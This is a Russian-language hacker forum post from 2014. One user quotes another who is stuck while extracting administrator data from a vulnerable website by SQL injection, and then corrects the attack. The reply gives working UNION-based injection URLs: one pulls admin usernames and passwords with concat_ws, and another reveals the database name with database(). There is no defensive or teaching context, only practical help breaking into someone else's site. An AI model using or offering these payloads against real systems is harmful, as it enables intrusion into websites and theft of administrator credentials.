21.07.2014, 17:22
|
|
Познающий
Регистрация: 09.10.2009
Сообщений: 31
Провел на форуме:
287607
Репутация:
19
|
|
Сообщение от billybonse
Парни, такая ситуация.
Нашел уязвимый сайт, через sql вытащил название таблицы - admin. Узнал названия колонок - admin_name, admin_email,admin_pass, admin_level.
Пишу - http://www.site.com/pages.php?id=-15%20union%20select%201,2,admin_name,4,5,6,7%20fro m%20admin%20limit%200,1--
Ответ - Table 'site.admin' doesn't exist
Подскажите, что за ситуация и как быть?
запрос должен быть таким примерно
http://www.site.com/pages.php?id=-15+union+select+1,2,concat_ws(0x3a,admin_name,admi n_pass),4,5,6,7+from+[название бд сайта].admin+limit+0,1--
[название бд сайта]- узнайте запросом
http://www.site.com/pages.php?id=-15+union+select+1,2,database(),4,5,6,7--
|
|
|